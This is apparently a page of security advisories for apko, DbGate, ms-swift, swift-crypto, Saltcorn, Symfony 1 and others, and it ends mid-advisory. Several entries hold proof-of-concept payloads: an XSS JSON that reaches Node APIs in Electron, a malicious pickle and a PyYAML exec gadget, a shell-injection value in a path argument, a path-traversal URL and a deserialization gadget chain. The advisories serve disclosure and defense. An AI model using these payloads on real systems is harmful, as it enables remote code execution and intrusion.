الوصف الكامل

apko verifies the signature on `APKINDEX.tar.gz` but never compares individually downloaded `.apk` packages against the checksum recorded in the signed index. The checksum is parsed and available via `ChecksumString()`, and the downloaded package control hash is computed, but the two values are never compared in `getPackageImpl()`. Mismatched packages are silently accepted. An attacker who can substitute download responses (compromised mirror, HTTP repository, poisoned CDN cache) can install arbitrary packages into built images. **Fix:** No fix available yet. **Acknowledgements** apko thanks Oleh Konko from [1seal](https://1seal.org/) for discovering and reporting this issue.

الإصدارات المتأثرة

All versions < 1.2.7

نوع الثغرة

CWE-345 — CWE-345

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

المراجع

الوصف الكامل

### Impact A crafted `.apk` could install a `TypeSymlink` tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. The root cause was the `sanitizePath` helper in `pkg/apk/fs/rwosfs.go`, which rejected only lexical `..` traversal and did not resolve or refuse symlinks. Every disk-backed `DirFS` method that handed its caller-supplied path to a symlink-following stdlib call — `ReadFile`, `WriteFile`, `Chmod`, `Chown`, `Chtimes`, `MkdirAll`, `Mkdir`, and `Mknod` — was affected. The reachable primitive from a malicious APK during tar extraction is the `MkdirAll` / `Mkdir` / `WriteFile` chain via `apko build-cpio` and disk-backed consumers such as `melange`; the remaining sinks are reachable by direct callers of the `pkg/apk/fs` package. The in-memory `tarfs` install path used by `apko build`, `apko publish`, and `apko build-minirootfs` is not affected. ### Patches Fixed in apko **v1.2.5** by [#2187](https://github.com/chainguard-dev/apko/pull/2187) / commit [f5a96e1](https://github.com/chainguard-dev/apko/commit/f5a96e1299ac81c7ea9441705ec467688086f442), which scopes all `DirFS` operations through a Go 1.24 `*os.Root`. The `sanitizePath` helper has been removed; `*os.Root` refuses traversal via `..`, absolute-target symlinks, relative-target symlinks, and hardlinks by construction. Regression tests in `pkg/apk/apk/path_traversal_test.go` cover each composite primitive. ### Workarounds No complete workaround. Operators running pre-1.2.5 apko (or downstream tools such as melange that embed pre-1.2.5 `pkg/apk/fs`) should upgrade. Consuming only APKs from trusted, signed sources reduces but does not eliminate exposure. ### Resources - https://github.com/chainguard-dev/apko/pull/2187 - https://github.com/chainguard-dev/apko/commit/f5a96e1299ac81c7ea9441705ec467688086f442 - https://github.com/chainguard-dev/apko/releases/tag/v1.2.5 - Related: GHSA-5g94-c2wx-8pxw (CVE-2026-25121) — prior lexical `..` traversal fix ### Credits apko thanks Oleh Konko ([@1seal](https://github.com/1seal) from [1seal.org](https://1seal.org/)) for the initial report of the symlink-escape class, and to [@Xh081iX](https://github.com/Xh081iX) for a follow-up set of reports covering additional reachable primitives (`ReadFile`, `Chmod`/`Chown`, `Mknod`, `MkdirAll`/`Mkdir`) that shaped the comprehensive fix.

الإصدارات المتأثرة

All versions < 1.2.5

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

المراجع

الوصف الكامل

`DiscoverKeys` in `pkg/apk/apk/implementation.go` unconditionally type-asserts JWKS keys as `*rsa.PublicKey` without checking the key type. If a repository JWKS endpoint returns a non-RSA key (e.g. EC), the unchecked assertion panics and crashes apko. This affects any workflow that initializes the APK database and fetches repository keys. Affected versions <= 0.30.34. **Fix:** No fix available yet. **Acknowledgements** apko thanks Oleh Konko from [1seal](https://1seal.org/) for discovering and reporting this issue.

الإصدارات المتأثرة

All versions < 1.2.7

نوع الثغرة

CWE-704 — CWE-704

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

GFI HelpDesk before 4.99.10 contains a stored cross-site scripting vulnerability in the Reports module where the title parameter is passed directly to SWIFT_Report::Create() without HTML sanitization. Attackers can inject arbitrary JavaScript into the report title field when creating or editing a report, and the payload executes when staff members view and click the affected report link in the Manage Reports interface.

الإصدارات المتأثرة

4.99.10

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

A security vulnerability has been detected in DbGate up to 7.1.4. This affects an unknown function of the file packages/web/src/icons/FontIcon.svelte of the component SVG Icon String Handler. Such manipulation of the argument applicationIcon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 7.1.5 mitigates this issue. It is advisable to upgrade the affected component.

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

### Summary The X-Wing decapsulation path accepts attacker-controlled encapsulated ciphertext bytes without enforcing the required fixed ciphertext length. The decapsulation call is forwarded into a C API, which expects a compile-time fixed-size ciphertext buffer of 1120 bytes. This creates an FFI memory-safety boundary issue when a shorter `Data` value is passed in, because the C code may read beyond the Swift buffer. The issue is reachable through initialization of an `HPKE.Recipient`, which decapsulates the provided `encapsulatedKey` during construction. A malformed `encapsulatedKey` can therefore trigger undefined behavior instead of a safe length-validation error. ### Details The `decapsulate` function of `OpenSSLXWingPrivateKeyImpl` does not perform a length check before passing the `encapsulated` data to the C API. ```swift func decapsulate(_ encapsulated: Data) throws -> SymmetricKey { try SymmetricKey(unsafeUninitializedCapacity: Int(XWING_SHARED_SECRET_BYTES)) { sharedSecretBytes, count in try encapsulated.withUnsafeBytes { encapsulatedSecretBytes in let rc = CCryptoBoringSSL_XWING_decap( sharedSecretBytes.baseAddress, encapsulatedSecretBytes.baseAddress, &self.privateKey ) guard rc == 1 else { throw CryptoKitError.internalBoringSSLError() } count = Int(XWING_SHARED_SECRET_BYTES) } } } ``` The C API does not have a runtime length parameter and instead expects a fixed-size buffer of 1120 bytes. ```c #define XWING_CIPHERTEXT_BYTES 1120 OPENSSL_EXPORT int XWING_decap( uint8_t out_shared_secret[XWING_SHARED_SECRET_BYTES], const uint8_t ciphertext[XWING_CIPHERTEXT_BYTES], const struct XWING_private_key *private_key); ``` Since `decapsulate` accepts arguments of any length, an attacker controlled input can trigger an out-of-bounds read. The vulnerable code path can be reached through by initializing a `HPKE.Recipient`. This creates a new `HPKE.Context`, which decapsulates the attacker-controlled `enc` argument: ```swift init<PrivateKey: HPKEKEMPrivateKey>(recipientRoleWithCiphersuite ciphersuite: Ciphersuite, mode: Mode, enc: Data, psk: SymmetricKey?, pskID: Data?, skR: PrivateKey, info: Data, pkS: PrivateKey.PublicKey?) throws { let sharedSecret = try skR.decapsulate(enc) self.encapsulated = enc self.keySchedule = try KeySchedule(mode: mode, sharedSecret: sharedSecret, info: info, psk: psk, pskID: pskID, ciphersuite: ciphersuite) } ``` ### PoC This PoC constructs an `HPKE.Recipient` using the X-Wing ciphersuite and deliberately passes a 1-byte `encapsulatedKey` instead of the required 1120 bytes. In a normal run, the malformed input is accepted and it reaches the vulnerable decapsulation path, i.e., no size rejection occurs. In an AddressSanitizer run, the same PoC produces a `dynamic-stack-buffer-overflow` read, confirming memory-unsafe behavior. ```swift //===----------------------------------------------------------------------===// // // PoC for X-Wing malformed ciphertext-length decapsulation: // X-Wing decapsulation accepts malformed ciphertext length and forwards it to C. // // This test is intentionally unsafe and is expected to crash (or trip ASan) // on vulnerable builds when run. // //===----------------------------------------------------------------------===// #if canImport(FoundationEssentials) import FoundationEssentials #else import Foundation #endif import XCTest #if CRYPTO_IN_SWIFTPM && !CRYPTO_IN_SWIFTPM_FORCE_BUILD_API // Skip tests that require @testable imports of CryptoKit. #else #if !CRYPTO_IN_SWIFTPM_FORCE_BUILD_API @testable import CryptoKit #else @testable import Crypto #endif final class XWingMalformedEncapsulationPoCTests: XCTestCase { func testShortEncapsulatedKeyHPKERecipientInit() throws { if #available(iOS 19.0, macOS 16.0, watchOS 12.0, tvOS 19.0, macCatalyst 19.0, *) { let ciphersuite = HPKE.Ciphersuite.XWingMLKEM768X25519_SHA256_AES_GCM_256 let skR = try XWingMLKEM768X25519.PrivateKey.generate() let malformedEncapsulatedKey = Data([0x00]) // should be 1120 bytes // Vulnerable path: HPKE.Recipient -> skR.decapsulate(enc) -> XWING_decap(...) _ = try HPKE.Recipient( privateKey: skR, ciphersuite: ciphersuite, info: Data(), encapsulatedKey: malformedEncapsulatedKey ) XCTFail("Unexpectedly returned from malformed decapsulation path") } } } #endif // CRYPTO_IN_SWIFTPM ``` #### Steps 1. Add the PoC XCTest above to the test suite. 2. Run the PoC normally to verify that malformed input is not rejected by length: ```bash swift test --filter XWingMalformedEncapsulationPoCTests/testShortEncapsulatedKeyHPKERecipientInit ``` 3. Run the same PoC with AddressSanitizer enabled to detect out-of-bounds memory access: ```bash swift test --sanitize=address --filter XWingMalformedEncapsulationPoCTests/testShortEncapsulatedKeyHPKERecipientInit ``` #### Results ##### Normal run The PoC test reaches the `XCTFail` path. `HPKE.Recipient(...)` accepted a `1`-byte X-Wing encapsulated key instead of rejecting it for incorrect length. ```text Test Case 'XWingMalformedEncapsulationPoCTests.testShortEncapsulatedKeyHPKERecipientInit' started ... failed - Unexpectedly returned from malformed decapsulation path ``` ##### AddressSanitizer run The sanitizer run aborts with a read overflow while executing the same PoC path. This confirms the memory-safety violation. The malformed ciphertext reaches memory-unsafe behavior in the decapsulation chain. ```text ERROR: AddressSanitizer: dynamic-stack-buffer-overflow READ of size 1 ... SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow ==...==ABORTING ``` ### Impact A remote attacker can supply a short X-Wing HPKE encapsulated key and trigger an out-of-bounds read in the C decapsulation path, potentially causing a crash or memory disclosure depending on runtime protections. Reported by Cantina.

الإصدارات المتأثرة

>= 4.0.0, <= 4.3.0

نوع الثغرة

CWE-787 — Out-of-bounds Write

المراجع

الوصف الكامل

### Summary A stored XSS vulnerability exists in DbGate because attacker-controlled SVG icon strings are rendered as raw HTML without sanitization. In the web UI this allows script execution in another user's browser; in the Electron desktop app this can escalate to local code execution because Electron is configured with `nodeIntegration: true` and `contextIsolation: false`. ### Details The issue is in the icon rendering path: - `packages/web/src/icons/FontIcon.svelte` - treats any icon string starting with `<svg` as inline SVG - renders it with `{@html iconValue}` without sanitization - `packages/api/src/controllers/apps.js` - loads app definitions from disk and returns `applicationIcon` to clients unchanged - `packages/web/src/appobj/DatabaseAppObject.svelte` - passes `applicationIcon` into `additionalIcons` - `packages/web/src/appobj/AppObjectCore.svelte` - renders those icons through `<FontIcon icon={ic.icon}>` This makes `applicationIcon` a stored XSS sink. An attacker who can create or modify an app definition can store a payload in `applicationIcon`. When another user views a matching database/app entry, the payload executes in that user's session. The impact is especially severe in Electron desktop because: - `app/src/electron.js` - `nodeIntegration: true` - `contextIsolation: false` With that configuration, JavaScript gained through XSS can access Node/Electron APIs, making local code execution possible. ### PoC This was reproduced by creating an app definition with a malicious `applicationIcon` and making it match a visible database. Example payload: ```json { "applicationName": "XSS PoC", "applicationIcon": "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"18\" height=\"18\"><circle cx=\"9\" cy=\"9\" r=\"8\" fill=\"red\"/></svg><img src=x onerror=\"alert('xss-fired')\">", "usageRules": [ { "serverHostsList": ["postgres"], "databaseNamesList": ["dbgate"] } ] } ``` After saving this app definition and opening the UI where the matching database/app icon is rendered, the JavaScript executes. RCE In Electron app: 1. Prepare an attacker-controlled application JSON file with a malicious `applicationIcon` value. 2. Set `usageRules` so the application matches a database the victim is likely to view. 3. Example payload: ```json { "applicationName": "XSS PoC", "applicationIcon": "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"18\" height=\"18\"><circle cx=\"9\" cy=\"9\" r=\"8\" fill=\"red\"/></svg><img src=x onerror=\"require('fs').writeFileSync(require('path').join(process.cwd(),'xss-rce-poc.txt'),'poc')\">", "usageRules": [ { "serverHostsRegex": ".*", "databaseNamesRegex": ".*" } ] } ``` 4. Deliver this JSON file to the victim as an application definition file. 5. The victim imports or saves the file into DbGate's apps storage, for example by opening/creating an application file and saving the attacker-controlled JSON content. 6. DbGate later loads that app definition through apps/get-all-apps. 7. When the victim opens a UI view that renders the matching database/application icon, the applicationIcon value is passed into FontIcon. 8. FontIcon detects that the string starts with <svg and renders it via raw {@html}. 9. The injected HTML executes in the Electron renderer process. 10. Because DbGate Desktop uses nodeIntegration: true and contextIsolation: false, the payload can access Node APIs and write the marker file xss-rce-poc.txt This demonstrates that a malicious saved application JSON file can become stored XSS in the UI and escalate to local code execution in Electron. ### Impact **Web app** If an attacker can place a malicious application definition where another user will load it, arbitrary JavaScript executes in the victim's browser session. This can lead to token theft, session hijacking, and performing privileged actions as the victim inside DbGate. **Electron desktop app** In the desktop app, the impact is more severe because the Electron renderer is configured with `nodeIntegration: true` and `contextIsolation: false`. If a victim imports or saves a malicious application definition and later opens a UI view that renders the icon, the XSS can access Node/Electron APIs and may result in local code execution on the victim machine.

الإصدارات المتأثرة

7.0.0 - 7.1.5

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

المراجع

الوصف الكامل

apko affected by potential unbounded resource consumption in expandapk.ExpandApk on attacker-controlled .apk streams in chainguard.dev/apko

الإصدارات المتأثرة

All versions < 1.1.1

المراجع

الوصف الكامل

A Path Traversal vulnerability was discovered in apko's dirFS filesystem abstraction. An attacker who can supply a malicious APK package (e.g., via a compromised or typosquatted repository) could create directories or symlinks outside the intended installation root. The MkdirAll, Mkdir, and Symlink methods in pkg/apk/fs/rwosfs.go use filepath.Join() without validating that the resulting path stays within the base directory. **Fix:** Fixed by [d8b7887](https://github.com/chainguard-dev/apko/commit/d8b7887a968a527791b3c591ae83928cb49a9f14). Merged into release. **Acknowledgements** apko thanks Oleh Konko from [1seal](https://1seal.org/) for discovering and reporting this issue.

الإصدارات المتأثرة

All versions < 1.1.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

المراجع

الوصف الكامل

`expandapk.Split` drains the first gzip stream of an APK archive via `io.Copy(io.Discard, gzi)` without explicit bounds. With an attacker-controlled input stream, this can force large gzip inflation work and lead to resource exhaustion (availability impact). The `Split` function reads the first tar header, then drains the remainder of the gzip stream by reading from the gzip reader directly without any maximum uncompressed byte limit or inflate-ratio cap. A caller that parses attacker-controlled APK streams may be forced to spend excessive CPU time inflating gzip data, leading to timeouts or process slowdown. **Fix:** Fixed with [2be3903](https://github.com/chainguard-dev/apko/commit/2be3903fe194ad46351840f0569b35f5ac965f09), Released in v1.1.0. **Acknowledgements** apko thanks Oleh Konko from [1seal](https://1seal.org/) for discovering and reporting this issue.

الإصدارات المتأثرة

All versions < 1.1.0

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

This appears to be a security vulnerability report describing a remote code execution (RCE) exploit in the ms-swift framework through malicious pickle deserialization in adapter model files. The vulnerability allows arbitrary command execution when loading specially crafted adapter models from ModelScope. This occurs when using machine torch version < 2.6.0, while ms-swift accepts torch version >= 2.0 **I. Detailed Description:** 1. Install ms-swift ``` pip install ms-swift -U ``` 2. Start web-ui ``` swift web-ui --lang en ``` 3. After startup, you can access [http://localhost:7860/](http://localhost:7860/) through your browser to see the launched fine-tuning framework program 4. Upload an adapter model repository (cyjhhh/lora_adapter_4_llama3) on ModelScope, where the lora/adapter_model.bin file is generated through the following code: ```python import torch, pickle, os class MaliciousPayload: def __reduce__(self): return (os.system, ("touch /tmp/malicious.txt",)) # Arbitrary command malicious_data = { "v_head.summary.weight": MaliciousPayload(), "v_head.summary.bias": torch.randn(10) } if __name__ == "__main__": with open("adapter_model.bin", "wb") as f: pickle.dump(malicious_data, f) ``` 5. First training submission: First, fill in the required parameters in the LLM Training interface, including Model id and Dataset Code, and configure the following in the Other params section of Advanced settings 6. Click Begin to submit. You can see the backend command running as follows 7. By reading the ms-swift source code, swift.llm.model.utils#safe_snapshot_download() and modelscope.hub.utils.utils#get_cache_dir(), we can see that adapters are downloaded locally to the path ~/.cache/modelscope. Therefore, the complete local path for the specified remote adapters after download is: ``` ~/.cache/modelscope/hub/models/cyjhhh/lora_adapter_4_llama3 ``` Wait for the first submission program until the adapters download is complete, then you can click "kill running task" on the page to terminate the first training 8. Second training submission, configure the page parameters as follows Click submit to see the backend command running as follows 9. After waiting for a while, you can see that torch.load() loaded the malicious adapter_model.bin file and successfully executed the command. Related execution information can also be seen in the log file corresponding to --logging_dir 10. Note (Prerequisites) Requires machine torch version < 2.6.0, while ms-swift accepts torch version >= 2.0 **II. Vulnerability Proof:** 1. Remote downloaded adapter malicious model: [[lora_adapter_4_llama3](https://www.modelscope.cn/models/cyjhhh/lora_adapter_4_llama3/files)](https://www.modelscope.cn/models/cyjhhh/lora_adapter_4_llama3/files) 2. For the second training submission, it's recommended to follow the parameters shown in the screenshots above for reproduction, as it will validate the target modules specified in the base model and adapter config. If they don't match, the program will terminate early. It's also recommended to select the same dataset content as shown in the screenshots 3. This report only reproduces RCE for one entry point (single path). In reality, there are more than one path in the code that can cause deserialization RCE **III. Fix Solution:** ``` SWIFT has disabled torch.load operations from 3.7 or later. ``` ## Author * Discovered by: [TencentAISec](https://github.com/TencentAISec) * Contact: *[security@tencent.com](mailto:security@tencent.com)*

الإصدارات المتأثرة

1.0.0, 1.1.0, 1.2.0, 1.2.1, 1.3.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

المراجع

الوصف الكامل

**I. Detailed Description:** This includes scenarios, screenshots, vulnerability reproduction methods. For account-related vulnerabilities, please provide test accounts. If the reproduction process is complex, you may record a video, upload it to Taopan, and attach the link. 1. Install ms-swift ``` pip install ms-swift -U ``` 2. Start web-ui ``` swift web-ui --lang en ``` 3. After startup, access through browser at [http://localhost:7860/](http://localhost:7860/) to see the launched fine-tuning framework program 4. Fill in necessary parameters In the LLM Training interface, fill in required parameters including Model id, Dataset Code. The --output_dir can be filled arbitrarily as it will be modified later through packet capture 5. Click Begin to start training. Capture packets and modify the parameter corresponding to --output_dir You can see the concatenated command being executed in the terminal where web-ui was started 6. Wait for the program to run (testing shows it requires at least 5 minutes), and you can observe the effect of command execution creating files **II. Vulnerability Proof (Write POC here):** ``` /tmp/xxx'; touch /tmp/inject_success_1; # ``` **III. Fix Solution:** 1. The swift.ui.llm_train.llm_train.LLMTrain#train() method should not directly concatenate parameters with commands after receiving commands from the frontend 2. The swift.ui.llm_train.llm_train.LLMTrain#train_local() method should not use os.system for execution, but should be changed to subprocess.run([cmd, arg1, arg2...]) format ## Author * Discovered by: [TencentAISec](https://github.com/TencentAISec) * Contact: *[security@tencent.com](mailto:security@tencent.com)*

الإصدارات المتأثرة

1.0.0, 1.1.0, 1.2.0, 1.2.1, 1.3.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

المراجع

الوصف الكامل

## Description A Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`. If an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution. ## Affected Repository - **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift) - **Affect versions:** latest - **File:** `tests/run.py` - **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420 - **Dependency:** PyYAML <= 5.3.1 ## Vulnerable Code ```python if args.run_config is not None and Path(args.run_config).exists(): with open(args.run_config, encoding='utf-8') as f: run_config = yaml.load(f, Loader=yaml.FullLoader) ``` ## Proof of Concept (PoC) ### Step 1: Create malicious YAML file (`exploit.yaml`) ```yaml !!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('mkdir HACKED')" ``` ### Step 2: Execute with vulnerable PyYAML (<= 5.3.1) ```python import yaml with open("exploit.yaml", "r") as f: cfg = yaml.load(f, Loader=yaml.FullLoader) ``` This results in execution of `os.system`, proving code execution. ## Mitigation * Replace `yaml.load()` with `yaml.safe_load()` * Upgrade PyYAML to version 5.4 or later ### Example Fix: ```python # Before yaml.load(f, Loader=yaml.FullLoader) # After yaml.safe_load(f) ``` ## Author * Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩) * Contact: *\[[anchor.rongyu020221@gmail.com](mailto:anchor.rongyu020221@gmail.com)]*

الإصدارات المتأثرة

1.0.0, 1.1.0, 1.2.0, 1.2.1, 1.3.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

A vulnerability was found in Ackites KillWxapkg up to 2.4.1. It has been declared as critical. This vulnerability affects the function processFile of the file internal/unpack/unpack.go of the component wxapkg File Parser. The manipulation leads to os command injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used.

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

It was discovered that the ld.so.cache in images generated by apko had file system permissions mode `0666`: ``` bash-5.3# find / -type f -perm -o+w /etc/ld.so.cache ``` This issue was introduced in commit [04f37e2 ("generate /etc/ld.so.cache (#1629)")](https://github.com/chainguard-dev/apko/commit/04f37e2d50d5a502e155788561fb7d40de705bd9)([v0.27.0](https://github.com/chainguard-dev/apko/releases/tag/v0.27.0)). ### Impact This potentially allows a local unprivileged user to add additional additional directories including dynamic libraries to the dynamic loader path. A user could exploit this by placing a malicious library in a directory they control. ### Patches This issue was addressed in apko in [aedb077 ("fix: /etc/ld.so.cache file permissions (#1758)")](https://github.com/chainguard-dev/apko/commit/aedb0772d6bf6e74d8f17690946dbc791d0f6af3) ([v0.29.5](https://github.com/chainguard-dev/apko/releases/tag/v0.29.5)). ### Acknowledgements Many thanks to Cody Harris from [H2O.ai](http://h2o.ai/) for reporting this issue.

الإصدارات المتأثرة

All versions < 0.29.5

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L

المراجع

الوصف الكامل

A vulnerability was found in Ackites KillWxapkg up to 2.4.1. It has been rated as problematic. This issue affects some unknown processing of the component wxapkg File Decompression Handler. The manipulation leads to resource consumption. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used.

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L

المراجع

الوصف الكامل

### Summary A user with admin permission can read arbitrary file and directory names on the filesystem by calling the `admin/build-mobile-app/result?build_dir_name=` endpoint. The `build_dir_name` parameter is not properly validated and it's then used to construct the `buildDir` that is read. The file/directory names under the `buildDir` will be returned. ### Details - file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L2884-L2893 ```js router.get( "/build-mobile-app/result", isAdmin, error_catcher(async (req, res) => { const { build_dir_name } = req.query; // [1] source const rootFolder = await File.rootFolder(); const buildDir = path.join( rootFolder.location, "mobile_app", build_dir_name // [2] ); const files = await Promise.all( fs .readdirSync(buildDir) // [3] sink .map(async (outFile) => await File.from_file_on_disk(outFile, buildDir)) ); [...] }) ); ``` ### PoC - log into the application as an admin user - visit the following url: `http://localhost:3000/admin/build-mobile-app/result?build_dir_name=/../../../../../../../../` **NOTE**: it's possible to only see file and directory names but not to download their content. ### Impact Information disclosure ### Recommended Mitigation Resolve the `buildDir` and check if it starts with `${rootFolder.location}/mobile_app`.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

### Summary Exposure of HTTP basic auth credentials from repository and keyring URLs in log output ### Details There was a handful of instances where the `apko` tool was outputting error messages and log entries where HTTP basic authentication credentials were exposed for one of two reasons: 1. The`%s` verb was used to format a `url.URL` as a string, which includes un-redacted HTTP basic authentication credentials if they are included in the URL. 2. A string URL value (such as from the configuration YAML file supplied used in an apko execution) was never parsed as a URL, so there was no chance of redacting credentials in the logical flow. apko, as well as its companion library `go-apk`, have been updated to ensure URLs are parsed and redacted before being output as string values. ### PoC Create a config file like this `apko.yaml`: ```yaml contents: keyring: - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub repositories: - https://me%40example.com:supersecretpassword@localhost:8080/os packages: - wolfi-base cmd: /bin/sh -l archs: - x86_64 - aarch64 ``` Then run: ```shell apko build apko.yaml latest foo.tar --log-level debug ``` Observe instances of the password being shown verbatim in the log output, such as: ```text ... DEBU image configuration: contents: repositories: - https://me%40example.com:supersecretpassword@localhost:8080/os keyring: - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub packages: - wolfi-base ... ``` ### Impact For users accessing keyring or APK repository content using HTTP basic auth, credentials were being logged in plaintext, depending on the user's logging settings. If you use apko in continuous integration jobs, it is likely that the credentials leak via logs of these jobs. Depending on the accessibility of these logs, this could be a company-internal or public leakage of credentials.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

A remote code execution vulnerability has been found in the Swift Mailer library (swiftmailer/swiftmailer) recently. [See this advisory for details](http://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html). If you are not using the default mail() transport, this particular problem does not affect you. Upgrading is of course still recommended!

الإصدارات المتأثرة

4.1.5, 5.0.3, 5.2.2, 5.3.1, 5.4.1

المراجع

الوصف الكامل

A vulnerability, which was classified as critical, has been found in kyivstarteam react-native-sms-user-consent up to 1.1.4 on Android. Affected by this issue is the function `registerReceiver` of the file `android/src/main/java/ua/kyivstar/reactnativesmsuserconsent/SmsUserConsentModule.kt`. The manipulation leads to improper export of android application components. Attacking locally is a requirement. Upgrading to version 1.1.5 is able to address this issue. The name of the patch is 5423dcb0cd3e4d573b5520a71fa08aa279e4c3c7. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259508.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

### Summary Symfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project. ### Details This vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example: ```php public function executeIndex(sfWebRequest $request) { $a = unserialize($request->getParameter('user')); } ``` We will make the assumption this is the case in the rest of this explanation. Symfony 1 depends on Swift Mailer which is bundled by default in `vendor` directory in the default installation since 1.3.0. Swift Mailer classes implement some `__destruct()` methods like for instance `Swift_KeyCache_DiskKeyCache` : ```php public function __destruct() { foreach ($this->_keys as $nsKey=>$null) { $this->clearAll($nsKey); } } ``` This method is called when php destroy the object in memory. However, it is possible to include any object type in `$this->_keys` to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on `foreach($this->_keys ...)` for any class implementing `ArrayAccess` interface. `sfOutputEscaperArrayDecorator` implements such interface. Here is the call made on `offsetGet()`: ```php public function offsetGet($offset) { return sfOutputEscaper::escape($this->escapingMethod, $this->value[$offset]); } ``` Which trigger `escape()` in `sfOutputEscaper` class with attacker controlled parameters from deserialized object with `$this->escapingMethod` and `$this->value[$offset]`: ```php public static function escape($escapingMethod, $value) { if (null === $value) { return $value; } // Scalars are anything other than arrays, objects and resources. if (is_scalar($value)) { return call_user_func($escapingMethod, $value); } ``` Which calls `call_user_func` with previous attacker controlled input. However, most recent versions of Swift Mailer are not vulnerable anymore. A fix has been done with [commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed](https://github.com/swiftmailer/swiftmailer/commit/5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed) to prevent #arbitrary deserialization. This commit has been shipped with version 6.2.5 of Swift Mailer. Concreetly, `__wakeup()` have been implemented to clear attributes' values: ```php public function __wakeup() { $this->keys = []; } ``` And/or prevent any deserialization: ```php public function __wakeup() { throw new \BadMethodCallException('Cannot unserialize '.__CLASS__); } ``` If you install last version 1.5 with composer, you will end-up installing last 6.x version of Swift Mailer containing the previous fixes. Here is an extract of the composer.lock: ```json { "name": "friendsofsymfony1/symfony1", "version": "v1.5.15", "source": { "type": "git", "url": "https://github.com/FriendsOfSymfony1/symfony1.git", "reference": "9945f3f27cdc5aac36f5e8c60485e5c9d5df86f2" }, "require": { "php": ">=5.3.0", "swiftmailer/swiftmailer": "~5.2 || ^6.0" }, ... { "name": "swiftmailer/swiftmailer", "version": "v6.3.0", ... } } ``` By reviewing releases archives, `composer.json` targets vulnerable branch 5.x before Symfony 1.5.13 included: ```json { "name": "friendsofsymfony1/symfony1", "description": "Fork of symfony 1.4 with dic, form enhancements, latest swiftmailer and better performance", "type": "library", "license": "MIT", "require": { "php" : ">=5.3.0", "swiftmailer/swiftmailer": "~5.2" }, ... ``` So, the gadget chain is valid for at least versions until 1.5.13. However, if you install last version of Symfony with git as described in the README, Swift Mailer vendors is referenced through a git sub-module targeting branch 5.x of Swift Mailer: ```shell [submodule "lib/vendor/swiftmailer"] path = lib/vendor/swiftmailer url = https://github.com/swiftmailer/swiftmailer.git branch = 5.x [submodule "lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine"] path = lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine url = https://github.com/FriendsOfSymfony1/doctrine1.git ``` And branch 5.x does not have the backport of the fix committed on branch 6.x. Last commit date from Jul 